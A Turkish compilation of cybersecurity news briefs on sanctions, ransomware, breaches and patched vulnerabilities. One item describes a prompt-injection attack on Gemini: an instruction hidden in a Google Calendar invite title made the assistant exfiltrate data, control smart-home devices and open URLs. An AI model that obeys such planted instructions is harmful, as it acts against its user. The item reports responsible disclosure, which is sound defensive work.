Eylül 2024’te kurulan T3 Financial Crime Unit, bugüne kadar dünya genelinde 250 milyon dolarlık suç gelirini dondurdu. Bu girişim, TRM Labs, Tether ve TRON tarafından başlatıldı, Binance ise resmi katılımcı oldu. Çalışmalar kapsamında kara para aklama, yatırım dolandırıcılığı, şantaj ve terör finansmanı gibi suçlara yönelik binlerce işlem incelendi.

Öne çıkan vakalardan birinde, Binance iş birliğiyle “romance scam” saldırılarında elde edilen 6 milyon dolarlık kripto varlık donduruldu.

Kanada-ABD iş birliğiyle 74 milyon dolar engellendi
Kanada Ontario Eyalet Polisi’nin yönettiği “Project Atlas” ve Britanya Kolumbiyası Menkul Kıymetler Komisyonu’nun yürüttüğü “Operation Avalanche”, Chainalysis analitiğiyle desteklendi.

Son altı ayda 74,3 milyon dolarlık dolandırıcılık gelirine ulaşıldı ve büyük kısmı donduruldu. Tether iş birliğiyle 50 milyon dolarlık USDT kara listeye alındı.

Küresel etki
Project Atlas, 14 ülkede 2.000’den fazla kripto cüzdan adresini mağdurlarla ilişkilendirdi. Kanada, ABD, Almanya, Avustralya ve Birleşik Krallık mağdurlar arasında yer aldı.

Yöntem: blockchain seviyesinde müdahale
Her iki girişimde de koordineli operasyonlar ve blockchain düzeyinde doğrudan müdahalelerle suç gelirlerinin transfer edilmesi veya nakde çevrilmesi engellendi. Uzmanlar, bu modelin siber suçluların hareket alanını daraltmada kritik bir adım olduğunu belirtiyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Garantex’in kapatılmasının ardından Grinex devreye alındı
ABD Gizli Servisi’nin Mart 2025’te Garantex’in alan adlarına el koymasının ardından şirket yöneticilerinin müşteri varlıklarını Grinex’e aktardığı tespit edildi. ABD Hazine Bakanlığı Yabancı Varlıklar Kontrol Ofisi (OFAC), dün itibarıyla Grinex’i yaptırım listesine ekledi.

Yaptırımları aşmak için kuruldu
OFAC açıklamasında, Grinex’in tanıtım materyallerinde borsanın, Garantex’e yönelik yaptırımlar ve varlık dondurmaları sonrası kurulduğunun açıkça ifade edildiği vurgulandı. Grinex’in kuruluşundan bu yana milyarlarca dolarlık kripto para transferine aracılık ettiği belirtildi.

Garantex ve ortaklarına yeni yaptırımlar
OFAC ayrıca Garantex, üç kurucusu (Sergey Mendeleev, Aleksandr Mira Serda, Pavel Karavatsky) ve Rusya ile Kırgızistan’daki altı iş ortağı şirkete (InDeFi Bank, Exved, Old Vector, A7, A71, A7 Agent) yönelik yaptırımları da yeniledi.

Ödül çağrısı
ABD Dışişleri Bakanlığı, Garantex yöneticilerinin yakalanması veya mahkumiyetine yol açacak bilgiler için 6 milyon dolara kadar ödül teklif etti.

Geçmiş bağlantılar
Garantex, Hydra dark web pazarı ve Conti, Black Basta, LockBit, NetWalker, Ryuk, Phoenix Cryptolocker gibi fidye yazılımı gruplarıyla bağlantıları nedeniyle Nisan 2022’de yaptırım listesine alınmıştı. Bakanlığa göre Garantex, Nisan 2019–Mart 2025 arasında 96 milyar dolardan fazla kripto işlemine aracılık etti.

ABD’den mesaj
Hazine Bakanlığı Terörizm ve Mali İstihbarat Müsteşarı John K. Hurley, “Kripto borsalarını kara para aklama ve fidye yazılımlarına destek için kullanmak ulusal güvenliğimizi tehdit ediyor. Bu aktörleri ortaya çıkararak dijital varlık sektörünün bütünlüğünü korumaya kararlıyız” dedi.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Açık bug bounty ile bildirildi
Plex, hatayı hata ödül programı aracılığıyla öğrendiğini ve hızlıca gidererek yeni sürümü yayımladığını açıkladı. Güvenlik açığına ilişkin CVE kimliği henüz atanmamış olsa da, şirket 1.41.7.x–1.42.0.x sürümlerini çalıştıran tüm sunucuların risk altında olduğunu belirtti.

Yamalanan sürüm
Güvenlik açığını kapatan sürüm Plex Media Server 1.42.1.10060 olarak yayımlandı. Kullanıcılar, sunucu yönetim paneli veya resmi indirme sayfası üzerinden bu sürüme geçiş yapabiliyor.

Acil güncelleme çağrısı
Plex, etkilenen kullanıcılara gönderdiği e-postalarda, sistemlerinin eski sürüm çalıştırdığını belirterek “en kısa sürede güncelleme yapın” uyarısında bulundu. Şirket, saldırganların yamaları analiz ederek istismar geliştirmesinden önce önlem alınması gerektiğini vurguladı.

Plex geçmişte de hedef olmuştu
Mart 2023’te CISA, Plex Media Server’daki üç yıllık bir RCE açığını (CVE-2020-5741) “aktif istismar edilen” açıklar listesine almıştı. Bu zafiyetin, LastPass’in 2022’de yaşadığı büyük veri sızıntısıyla bağlantılı olabileceği düşünülüyor. Aynı yıl Plex de kullanıcı veritabanına sızıldığını ve şifrelerin sıfırlanması gerektiğini duyurmuştu.

Kullanıcılar için öneriler

• Plex Media Server’ınızı 1.42.1.10060 sürümüne güncelleyin.

• Güncellemeleri düzenli takip edin.

• Sunucunuzu internet üzerinden erişime açık bırakmamaya özen gösterin.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Kesinti dördüncü gününde sürüyor
Colt Telecom, 12 Ağustos’ta başlayan saldırının ardından destek hizmetlerine ait bazı sistemleri koruma amaçlı çevrim dışı bıraktı. Bu durum, müşteri iletişim platformlarını etkilerken yanıt sürelerinde gecikmelere yol açtı. Şirket, ana ağ altyapısının saldırıdan etkilenmediğini vurguladı.

WarLock grubu verileri satışa çıkardı
‘cnkjasdfgd’ takma adlı bir tehdit aktörü, kendisini WarLock fidye yazılımı grubunun üyesi olarak tanıtarak saldırıyı üstlendi. Hacker, şirketten çaldığı bir milyon belgeyi 200 bin dolar karşılığında satışa çıkardı ve içeriğin doğruluğunu göstermek için örnekler paylaştı. Belgeler arasında mali veriler, müşteri ve çalışan kayıtları, iç yazışmalar ve yazılım geliştirme dokümanları olduğu öne sürüldü.

Microsoft SharePoint açığına işaret ediliyor
Siber güvenlik uzmanı Kevin Beaumont, saldırının Microsoft SharePoint’teki CVE-2025-53770 açığı üzerinden gerçekleştirilmiş olabileceğini belirtti. Bu sıfır gün açığı 18 Temmuz’dan itibaren istismar edilmiş, Microsoft ise 21 Temmuz’da güvenlik güncellemesi yayımlamıştı.

Şirketten açıklama
Colt, saldırıyı doğrularken çalındığı iddia edilen veriler hakkında yorum yapmadı. Şirket sözcüsü, “Siber olaya ilişkin iddiaların farkındayız. İç sistemlerimizi yeniden çalışır hale getirmek için üçüncü taraf uzmanlarla birlikte çalışıyoruz” dedi.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Yeni güvenlik katmanları geliyor
Microsoft 365 yol haritasında yer alan güncellemeye göre Teams, sohbet ve kanallarda çalıştırılabilir dosya türlerini (örn. .exe) engelleyerek dosya tabanlı saldırılara karşı koruma sağlayacak. Ayrıca gönderilen kötü amaçlı bağlantılar otomatik olarak tespit edilip kullanıcıya uyarı verilecek.

Defender entegrasyonu
Microsoft, Teams’in artık Defender for Office 365 Tenant Allow/Block List ile entegre olduğunu duyurdu. Bu sayede güvenlik yöneticileri engellenmiş alan adlarından gelen sohbet, kanal, toplantı ve çağrıları bloke edebilecek. Hatta bu alan adlarından gelen geçmiş iletişimler de otomatik olarak silinebilecek. Özellik Eylül 2025 sonunda genel kullanıma açılacak.

Daha önce gelen güvenlik adımları

• Temmuz 2025: Ekran görüntüsü engelleme özelliği devreye alındı. Toplantılarda kullanıcı ekran görüntüsü almaya çalıştığında pencere siyaha düşerek bilgi sızıntısı önleniyor.

• Şubat 2025: Sohbetlerde marka taklitlerine karşı kimlik avı koruması tüm müşterilere sunuldu.

• Enterprise Connect 2024: Microsoft, Teams’in 320 milyon aylık aktif kullanıcıya ulaştığını açıkladı.

Kullanıma sunulma takvimi
Yeni URL ve dosya engelleme özelliklerinin Eylül 2025’ten itibaren dünya çapında kademeli olarak devreye alınması planlanıyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Açığın teknik detayları
Araştırmacı Aviv Y’nin “FortMajeure” adını verdiği açık, FortiWeb’in çerez ayrıştırma sürecindeki “Era” parametresinden kaynaklanıyor. Bu parametre beklenmedik bir değer aldığında, sunucu tüm sıfırlardan oluşan gizli anahtar kullanıyor. Sonuç olarak, sahte çerezler kolayca oluşturulabiliyor ve kimlik doğrulama tamamen atlatılabiliyor.

Nasıl istismar ediliyor
CVE-2025-52970’nin sömürülmesi için hedef kullanıcının aktif oturumunun bulunması gerekiyor. Saldırgan, çerezdeki küçük bir sayısal alanı tahmin etmek zorunda, ancak bu değer genellikle 30’un altında olduğundan brute force işlemi yalnızca birkaç denemeyle tamamlanabiliyor.

Etkilenen sürümler ve yamalar
Zafiyet FortiWeb 7.0–7.6 arasındaki sürümleri etkiliyor. Fortinet, aşağıdaki sürümlerde açığı kapattığını duyurdu:

• 7.6.4 ve sonrası

• 7.4.8 ve sonrası

• 7.2.11 ve sonrası

• 7.0.11 ve sonrası

FortiWeb 8.0 sürümlerinin etkilenmediği açıklandı.

Araştırmacının yaklaşımı
Aviv Y, REST uç noktası üzerinden admin taklidi gösteren bir PoC çıktısı paylaştı, ancak CLI’ye bağlanmayı da içeren tam istismar kodunu daha sonra yayımlayacağını belirtti. Amaç, saldırganlardan önce savunuculara sistemlerini yamalama süresi tanımak.

Yama dışında çözüm yok
Fortinet’in güvenlik bülteninde herhangi bir geçici çözüm sunulmadı. Bu nedenle güvenli sürümlere güncelleme yapmak tek etkili adım olarak gösteriliyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Ransomware gelirleri takip edildi
Antropenko’nun, Zeppelin fidye yazılımı saldırılarıyla elde ettiği fidye ödemelerini aklamak için ChipMixer gibi kripto para karıştırma hizmetlerini, nakit dönüşüm işlemlerini ve parçalara bölünmüş banka yatırımlarını kullandığı tespit edildi. ChipMixer, Mart 2023’te yetkililer tarafından kapatılmıştı.

Zeppelin’in geçmişi
2019 sonunda VegaLocker/Buran fidye yazılımının bir türevi olarak ortaya çıkan Zeppelin, özellikle sağlık ve bilişim firmalarını hedef aldı. 2021’de güncellenmiş sürümlerle yeniden ortaya çıksa da kullanılan şifreleme yöntemlerinin zayıflığı dikkat çekmişti.

Kasım 2022’de operasyon büyük ölçüde sona erdi. Daha sonra güvenlik araştırmacılarının 2020’den bu yana ücretsiz dosya kurtarma anahtarına sahip olduğu ortaya çıktı. Ocak 2024’te ise Zeppelin kaynak kodunun bir hacker forumunda yalnızca 500 dolara satıldığı bildirildi.

Fidye ödemelerine el konuldu
Ele geçirilen 2,8 milyon doların fidye gelirlerinden kaynaklandığı belirtiliyor. ABD yetkilileri geçtiğimiz haftalarda da BlackSuit grubundan 1 milyon dolar, Chaos grubundan ise 2,4 milyon dolar değerinde Bitcoin’e el koymuştu.

Uzmanlara göre kritik adım
Yetkililer, bu tür el koyma operasyonlarının, siber suçluların yakalanamadığı durumlarda bile fidye gelirlerini kullanarak yeniden yapılanmalarını veya yeni üyeler kazanmalarını engellemede kritik rol oynadığını vurguladı.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Sahte otomasyon araçlarıyla yayılım
Ruby programlama dilinin resmi paket yöneticisi RubyGems.org üzerinde, farklı takma adlar kullanan saldırganlar tarafından yayımlanan zararlı kütüphaneler, özellikle Güney Koreli kullanıcıları hedef aldı. Paketler, WordPress, Telegram, Naver Café, SEO araçları ve blog platformlarına yönelik otomasyon yazılımları gibi tanıtıldı.

Gerçekte kimlik avı aracı
Kütüphaneler kurulduğunda meşru görünümlü bir arayüz sunuyor, ancak kullanıcı giriş bilgilerini doğrudan saldırganların kontrolündeki alan adlarına (programzon[.]com, appspace[.]kr, marketingduo[.]co[.]kr) iletiyordu. Çalınan veriler arasında kullanıcı adı, şifre (düz metin), cihaz MAC adresi ve paket adı bulunuyor.

Karanlık ağda satışa çıktı
Araştırmacılar, elde edilen bilgilerin Rusça konuşulan dark web pazarlarında satışa çıkarıldığını tespit etti. Kimlik bilgisi günlüklerinin saldırganların kontrol ettiği marketingduo[.]co[.]kr ile bağlantılı olduğu belirlendi.

16 paket hâlâ yayında
Socket, tüm zararlı paketleri RubyGems ekibine bildirdiğini, ancak en az 16’sının hâlâ indirilebilir olduğunu açıkladı. Bu durum, açık kaynak yazılım depolarına yönelik tedarik zinciri saldırılarının süregelen bir tehdit olduğunu gösteriyor.

Geliştiricilere uyarı
Uzmanlar, kütüphaneleri indirirken yayıncının geçmişini ve paketlerin şüpheli kod içerip içermediğini kontrol etmeyi, bağımlılıkları güvenli sürümlere kilitlemeyi ve obfuscation (gizlenmiş) kod parçaları içeren paketlere karşı dikkatli olunması gerektiğini vurguluyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

İhlal potansiyel müşterileri etkiledi
Google’ın yaptığı bildirimde, Salesforce üzerinden potansiyel Ads müşterileriyle iletişimde kullanılan verilerin yetkisiz kişilerce erişildiği belirtildi. Etkilenen veriler arasında şirket adları, telefon numaraları ve satış temsilcilerinin notları yer aldı. Ads hesapları, Merchant Center, Analytics ve diğer ürünlerdeki müşteri verilerinin etkilenmediği vurgulandı.

ShinyHunters saldırının arkasında
Saldırının, son aylarda Salesforce müşterilerini hedef alan ShinyHunters grubuyla bağlantılı olduğu doğrulandı. Grup, ele geçirilen verilerin yaklaşık 2,55 milyon kayıttan oluştuğunu iddia etti. Kayıtların arasında mükerrer girişler olabileceği belirtildi.

Scattered Spider ile iş birliği
ShinyHunters, saldırılarda ilk erişimi sağlayan Scattered Spider ile ortak hareket ettiklerini ve birlikte “Sp1d3rHunters” adı altında çalıştıklarını açıkladı. Grup, çalışanlara yönelik sosyal mühendislik saldırılarıyla kimlik bilgisi elde edip, Salesforce ortamlarına kötü amaçlı OAuth uygulamaları bağlatarak tüm veritabanlarını indirdiklerini bildirdi.

Fidye talebi ve yeni araçlar
ShinyHunters, Google’dan 20 Bitcoin (yaklaşık 2,3 milyon dolar) talep ettiklerini, ancak bu talebi “ciddi olmayan” bir hamle olarak nitelendirdiklerini söyledi. Grup ayrıca, artık Salesforce Data Loader yerine kendi geliştirdikleri Python tabanlı araçları kullandıklarını açıkladı.

Google’dan açıklama
Google, Haziran 2025’te bu saldırı yöntemlerine dikkat çekmişti. Şirket, saldırıyı doğrularken kullanıcıların Ads hesaplarının güvende olduğunu yineledi. Ayrıca, yeni araçlarla yapılan saldırıları gözlemlediklerini belirtti.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Kritik açık Calendar üzerinden tetiklendi
Gemini, Gmail, Calendar ve Google Home gibi hizmetlere entegre çalışıyor. Açık, saldırganın Google Calendar davetinde etkinlik başlığına zararlı bir “prompt injection” gizlemesiyle tetikleniyordu. Kullanıcı Gemini’ye “Bugün takvimimde ne var” gibi rutin bir soru yönelttiğinde, asistan ilgili başlıkları okuyor ve zararlı komutu da kendi bağlamında yürütüyordu.

Olası saldırı senaryoları
Bu yöntemle saldırganlar:

• Kullanıcının e-posta ve takvim verilerini dışarı aktarabiliyor,

• Akıllı ev cihazlarını uzaktan kontrol edebiliyor,

• Uygulama açabiliyor veya Zoom görüşmesi başlatabiliyor,

• Kullanıcının IP adresini öğrenmek için URL açtırabiliyordu.

Altı davetlik sinsi yöntem
Araştırmacılar, Calendar’da yalnızca son beş etkinliğin doğrudan görüntülendiğini belirledi. Bu nedenle saldırganların görünürlükten kaçınmak için altı davet göndermesi, zararlı prompt’u sonuncuya gizlemesi gerekiyordu. Kullanıcılar bu daveti yalnızca “Daha fazla göster” seçeneğine tıklarsa fark edebiliyordu.

Google açığı kapattı
Google, SafeBreach araştırmacıları Ben Nassi ve ekibinin sorumlu bildirim süreci sayesinde açığın istismar edilmeden kapatıldığını açıkladı. Google Workspace güvenlik ürün yönetimi direktörü Andy Wen, araştırmanın savunma mekanizmalarının geliştirilmesini hızlandırdığını vurguladı.

Daha önce de uyarılar yapılmıştı
Geçen ay Mozilla araştırmacısı Marco Figueroa, Gemini’nin başka bir “prompt injection” tekniğine karşı savunmasız olduğunu ve bunun kimlik avı saldırılarına kapı aralayabileceğini açıklamıştı. Google, yeni koruma önlemlerinin devreye alınmakta olduğunu belirtti.

Kaynak: CUMHA - CUMHUR HABER AJANSI

172 bin kişi etkilendi
27 Temmuz’da tamamlanan incelemede, toplam 172 bin üyenin verilerinin risk altında olduğu tespit edildi. Çalınan bilgiler arasında isimler, hesap numaraları, banka kartı verileri, Sosyal Güvenlik numaraları ve devlet kimlikleri bulunuyor. Şirket, üyelerin hesap bakiyelerine erişildiğine dair bir bulgu olmadığını bildirdi.

Dolandırıcılık riski arttı
Connex, resmi internet sitesine koyduğu uyarıyla üyeleri devam eden oltalama saldırılarına karşı bilgilendirdi. Açıklamada, “Connex hiçbir zaman sizden PIN, şifre veya hesap numarası istemez. Şüpheli bir arama veya mesaj alırsanız telefonu kapatıp doğrudan bizi arayın” denildi.

Geniş çaplı saldırı dalgasının parçası
İhlalin, Salesforce platformlarını hedef alan ShinyHunters grubuyla ilişkilendirilen saldırı dalgasının ardından gelmesi dikkat çekti. Son aylarda Allianz Life, Adidas, Qantas, Louis Vuitton, Dior, Tiffany & Co., Chanel ve Google gibi markalar da benzer saldırılardan etkilenmişti.

Kaynak: CUMHA - CUMHUR HABER AJANSI

29 binden fazla sunucu yamalanmamış
Shadowserver’ın 10 Ağustos tarihli taramalarına göre dünya genelinde 29.098 sunucu halen yamalanmamış durumda. Bunların 7.200’den fazlası ABD’de, 6.700’den fazlası Almanya’da, 2.500’den fazlası ise Rusya’da bulunuyor.

Microsoft ve CISA’dan uyarılar
Microsoft, açığı Nisan 2025’te yayımladığı bir güvenlik danışmanlığı ve hotfix ile duyurdu. Şirket, “kötüye kullanılma ihtimali yüksek” olarak işaretlediği açık için tüm hibrit yapıların yeni mimariye geçirilmesini tavsiye etti.

ABD Siber Güvenlik ve Altyapı Güvenliği Ajansı (CISA), 25-02 numaralı acil direktifle federal kurumlara 9 Ağustos Pazartesi sabahına kadar yama yapma zorunluluğu getirdi. CISA ayrıca, federal olmayan kurumların da aynı adımları uygulaması gerektiğini vurguladı.

Alınması gereken önlemler

• Microsoft Health Checker script ile ortam taraması,

• EOL sürümlerin internetten ayrılması,

• Exchange 2019 için CU14/15, Exchange 2016 için CU23 yüklenmesi,

• Nisan 2025 hotfix’inin uygulanması.

Uyarı: tam etki alanı ele geçirilebilir
CISA, önlemlerin alınmaması halinde hem hibrit bulut hem de on-premise ortamların tamamen ele geçirilme riskiyle karşı karşıya olduğunu açıkladı.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Dört üst düzey üye iade edildi
Gana merkezli dolandırıcılık örgütünün yöneticileri olduğu belirtilen Isaac Oduro Boateng (“Kofi Boat”), Inusah Ahmed (“Pascal”), Derrick Van Yeboah (“Van”) ve Patrick Kwame Asare (“Borgar”), 7 Ağustos’ta ABD’ye getirildi.

Yöntem: aşk dolandırıcılığı ve e-posta saldırıları
Mahkeme belgelerine göre çete, çoğunlukla yalnız yaşayan yaşlı Amerikalıları sahte romantik ilişkilerle kandırdı. Güven kazandıktan sonra mağdurları para göndermeye ikna ettiler. ABD’deki aracılar parayı akladıktan sonra asıl faillerin bulunduğu Batı Afrika’ya gönderdi.

Çete aynı zamanda şirketleri de hedef aldı. Çalışanların veya müşterilerin e-posta adreslerini taklit eden sahte hesaplarla finans yetkililerini kandırarak milyonlarca dolarlık havaleler yaptırdılar. Sahte imzalı belgelerle transferleri meşrulaştırdılar.

“Chairmen” adıyla yönetilen yapı
Boateng ve Ahmed örgütte “chairman” (başkan) rolünü üstlenirken, Asare ve Van Yeboah da üst düzey konumlarda faaliyet gösterdi. Van Yeboah’ın özellikle aşk dolandırıcılığı operasyonlarında aktif rol aldığı belirlendi.

Ağır cezalar gündemde
Sanıklar; kablolu dolandırıcılık yapmak ve buna teşebbüs (20 yıla kadar), kara para aklama (20 yıl), çalıntı para alma ve buna teşebbüs (5 yıl) ve çalıntı parayı elde tutma (10 yıl) suçlamalarıyla yargılanacak.

Kaynak: CUMHA - CUMHUR HABER AJANSI

DarkBit saldırıları ve siyasi arka plan
2023’te gerçekleşen saldırıların, İran’daki mühimmat fabrikasına yönelik drone saldırılarının ardından misilleme amacı taşıdığı değerlendiriliyor. DarkBit grubu, daha önce İsrail’deki eğitim kurumlarını hedef almış ve propaganda içerikli fidye notları bırakmıştı. İsrail Ulusal Siber Komutanlığı, saldırıları MuddyWater ile ilişkilendirmişti.

Zayıf şifreleme yöntemi tespit edildi
Profero uzmanları, saldırıda kullanılan DarkBit fidye yazılımını analiz etti. Her dosya için AES-128-CBC ile üretilen anahtarların düşük entropiye sahip olduğu, zaman damgalarıyla birlikte olası kombinasyonların birkaç milyar ihtimale düştüğü keşfedildi.

ESXi sunucularındaki avantaj
Araştırmacılar, VMware sanal disk (VMDK) dosyalarının bilinen başlık baytlarını referans alarak brute force yöntemini hızlandırdı. Ayrıca VMDK dosyalarının seyrek yapısı nedeniyle, şifrelenmemiş geniş boşluklardan değerli verilerin doğrudan kurtarılabildiği belirlendi.

Fidye ödenmeden dosyalar geri alındı
Geliştirilen özel araç sayesinde, saldırganların talep ettiği 80 Bitcoin ödenmeden kritik dosyaların çoğu kurtarıldı. Profero, DarkBit’in fidye yerine veri silici (wiper) kullansaydı amacına daha uygun sonuç alabileceğini belirtti.

Kurtarma aracı halka açılmadı
Profero, DarkBit için geliştirdiği çözüm aracını kamuya açıklamayacağını, ancak gelecekte benzer saldırılardan etkilenen kurumların kendileriyle iletişime geçerek destek alabileceğini duyurdu.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Sıfır gün olarak kullanıldı
ESET, 18 Temmuz 2025’te RomCom grubunun WinRAR’daki belirsiz bir yol geçişi açığını istismar ettiğini tespit etti. Açık, alternatif veri akışlarının (ADS) kullanımıyla kötüye kullanılabiliyor ve CVE-2025-8088 olarak kaydedildi.

Zararlı dosyalar Startup klasörüne düşüyor
Hazırlanan RAR arşivlerinde sahte yollarla doldurulmuş çok sayıda ADS girdisi bulunuyor. Bunlar, zararlı DLL, EXE ve LNK dosyalarının arşiv açıldığında %TEMP% ve %LOCALAPPDATA% klasörlerine, kısayolların ise Windows Başlangıç klasörüne yerleştirilmesini sağlıyor.

Üç farklı saldırı zinciri
ESET, saldırılarda kullanılan üç ayrı enfeksiyon zinciri tespit etti:

• Mythic Agent: COM hijacking yoluyla AES şifreli shellcode çalıştırıyor, yalnızca belirli etki alanlarında aktif oluyor.

• SnipBot: Sahte bir PuTTY türeviyle yükleniyor, açılan belgeleri kontrol ederek ek zararlı indiriyor.

• MeltingClaw: RustyClaw üzerinden DLL indirip daha fazla modül çalıştırıyor.

Ek aktörler de açığı kullandı
Bi.Zone, CVE-2025-8088’in yanı sıra CVE-2025-6218 açığını da istismar eden “Paper Werewolf” adını verdiği farklı bir saldırı kümesini raporladı.

Güncelleme manuel yapılmalı
RARLab, açığın kapatıldığı 7.13 sürümünü 30 Temmuz’da yayımladı. Ancak WinRAR otomatik güncelleme özelliği içermediği için kullanıcıların en son sürümü manuel olarak indirip kurmaları gerekiyor.

Risk neden yüksek
Windows 2023’te RAR desteği eklese de kapsamı sınırlı. Kurumsal kullanıcılar ve ileri seviye bireysel kullanıcılar hâlen WinRAR’a bağımlı, bu da yazılımı saldırganlar için cazip hale getiriyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Bellek taşması sıfır gün olarak kullanıldı
Citrix NetScaler ADC ve Gateway ürünlerinde bulunan CVE-2025-6543, bellek taşması nedeniyle yetkisiz komut çalıştırılmasına veya hizmet reddine yol açabiliyor. Açık, VPN, ICA Proxy, CVPN, RDP Proxy ve AAA sanal sunucularını etkiliyor.

Kritik kurumlar hedef oldu
NCSC, Mayıs 2025’ten itibaren saldırganların açığı sıfır gün olarak kullandığını ve Hollanda’daki birden fazla kritik kuruma sızdığını açıkladı. Saldırganlar izlerini silerek olayları tespit etmeyi zorlaştırdı.

Savcılık saldırıyı doğruladı
Hollanda Savcılığı (Openbaar Ministerie), 18 Temmuz’da sistemlerinin ihlal edildiğini duyurdu. Olay ciddi operasyonel kesintilere neden oldu, e-posta sunucuları ancak Ağustos başında yeniden çalışmaya başladı.

Citrix’in yayımladığı yamalar
Citrix, 25 Haziran’da yayımladığı bültende şu sürümlere güncelleme yapılmasını tavsiye etti:

• 14.1 → 14.1-47.46 ve sonrası

• 13.1 → 13.1-59.19 ve sonrası

• 13.1-FIPS ve 13.1-NDcPP → 13.1-37.236 ve sonrası
  12.1 ve 13.0 sürümleri içinse destek sona erdi, güncel sürümlere yükseltme öneriliyor.

Ek güvenlik adımları
Yamaların ardından aktif oturumların kapatılması (icaconnection, pcoipConnection, aaa, rdp) ve load balancing oturumlarının temizlenmesi tavsiye edildi. Ayrıca NCSC, olağan dışı PHP/XHTML dosyalarının tespiti için GitHub üzerinden bir tarama scripti yayımladı.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Kimsuky’ye karşı etik çıkış
Sızıntıyı gerçekleştiren “Saber” ve “cyb0rg” takma adlı hackerlar, Phrack dergisinin DEF CON 33’te dağıtılan son sayısında, Kimsuky’yi “rejim çıkarlarına hizmet eden, etik dışı bir grup” olarak tanımladı. İkilinin açıklamasında, “Sanatı icra etmek yerine liderlerini zenginleştirmek için çalışan politik bir araçsınız” ifadeleri yer aldı.

8,9 GB veri çevrim içi yayımlandı
Distributed Denial of Secrets platformunda yayımlanan arşiv, Kimsuky’nin oltalama günlüklerini, çalıntı verilerini ve araçlarını içeriyor. Bunlar arasında:

• Güney Kore Savunma Karşı İstihbarat Komutanlığı’na (dcc.mil.kr) ait oltalama kayıtları,

• Güney Kore Dışişleri Bakanlığı’nın e-posta sistemi (“Kebi”) kaynak kodu,

• Vatandaşlık sertifikaları ve akademisyen listeleri,

• Sahte site oluşturma kiti (PHP Generator), canlı oltalama kitleri,

• Cobalt Strike yükleyicileri, ters bağlantı araçları ve Onnara proxy modülleri,

• VPN alımları, GitHub bağlantıları ve hack forumu kullanım kayıtları.

Operasyonel zorluk yaratabilir
Bitirici bir darbe olmasa da, uzmanlara göre bu ifşa Kimsuky’nin altyapısının “yanmasını” sağlayarak devam eden kampanyalarda aksamalara yol açabilir. Ayrıca, sızan belgeler Kimsuky’nin daha önce belgelenmemiş yöntemlerini ortaya çıkarıyor.

Araştırmacılar doğrulamaya çalışıyor
Sızdırılan dosyaların doğruluğu henüz bağımsız olarak tam teyit edilmedi. Ancak içerik, Kimsuky’nin bilinen faaliyetleriyle güçlü örtüşmeler taşıyor. Güvenlik araştırmacıları, sızıntının değerini analiz etmeye devam ediyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Ulusal Muhafızlar devreye girdi
29 Temmuz’da yaşanan saldırı sonrası Minnesota Valisi Tim Walz, şehrin olay müdahale kapasitesini aşan bu durum için Ulusal Muhafızları siber koruma desteği vermek üzere görevlendirdi. Şehir, çevrim içi ödemeler de dahil olmak üzere birçok hizmetin geçici olarak kesintiye uğradığını açıkladı.

Interlock saldırıyı üstlendi
Saint Paul Belediye Başkanı Melvin Carter, saldırının Interlock fidye yazılım grubu tarafından gerçekleştirildiğini ve fidye ödenmediğini doğruladı. Carter, vatandaşların kişisel veya finansal bilgilerinin saldırıdan etkilenmediğini söyledi.

66 bin dosya sızdırıldı
Interlock grubu, karanlık ağdaki sitesinde Saint Paul’u hedef olarak listeledi ve 43 GB büyüklüğünde, 66 binden fazla dosyayı ele geçirdiğini öne sürdü. Saldırganlar bu verilerin bir kısmını yayımladı.

Saldırının izleri
PRODAFT’ın açıklamasına göre saldırı, 20 Temmuz civarında şehir sistemlerine bulaştırılan ve Interlock’la ilişkilendirilen özel geliştirilmiş SystemBC RAT zararlısıyla başladı.

Grubun geçmişi
Eylül 2024’te ortaya çıkan Interlock, dünya genelinde özellikle sağlık kuruluşlarını hedef aldı. Daha önce İngiltere’deki üniversitelere NodeSnake trojanıyla saldırmış, DaVita’dan 1,5 TB ve Kettering Health’ten büyük miktarda veri çaldığını duyurmuştu. CISA ve FBI, saldırıdan günler önce Interlock’un kritik altyapılara yönelik çift şantajlı saldırılarında artış olduğunu açıklamıştı.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Kritik açığa karşı cihazlar savunmasız
Citrix NetScaler cihazlarında tespit edilen CVE-2025-5777 (CitrixBleed 2) açığı, yetersiz girdi doğrulaması nedeniyle oluşan “out-of-bounds memory read” hatasından kaynaklanıyor. Hedef alınan cihazlar arasında VPN, ICA Proxy, CVPN, RDP Proxy ve AAA sanal sunucuları bulunuyor.

Oturum ele geçirme riski
Açık, saldırganlara oturum belirteçleri, kimlik bilgileri ve hassas verileri çalma imkânı tanıyor. Böylece kullanıcı oturumlarını ele geçirerek çok faktörlü kimlik doğrulamayı atlatabiliyorlar. Açık ilk olarak sıfır gün saldırılarında istismar edildi, kısa süre sonra da PoC exploit kodları yayımlandı.

Hâlâ binlerce cihaz açıkta
Shadowserver’ın 11 Ağustos raporuna göre dünya genelinde 3.312 cihaz hâlâ CVE-2025-5777’e karşı korunmasız. Ayrıca 4.142 cihaz, DoS saldırılarında aktif olarak istismar edilen başka bir kritik açık (CVE-2025-6543) için de yamalanmamış durumda.

Hollanda’da kritik kurumlar hedef alındı
Hollanda Ulusal Siber Güvenlik Merkezi (NCSC), CVE-2025-6543 açığının Mayıs ayından bu yana sıfır gün olarak kullanıldığını, kritik kuruluşların saldırıya uğradığını ve izlerin saldırganlar tarafından silindiğini duyurdu. Temmuz ayında Hollanda Savcılığı’nın (Openbaar Ministerie) saldırı sonrası e-posta sunucularında haftalarca kesinti yaşadığı açıklandı.

ABD kurumlarına zorunlu talimat
ABD Siber Güvenlik ve Altyapı Güvenliği Ajansı (CISA), iki açığı da aktif istismar edilen zafiyetler listesine ekleyerek federal kurumlara CVE-2025-5777 için 1 gün, CVE-2025-6543 için ise 21 Temmuz’a kadar yamaları uygulama talimatı verdi.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Rusya çıkarlarıyla uyumlu operasyonlar
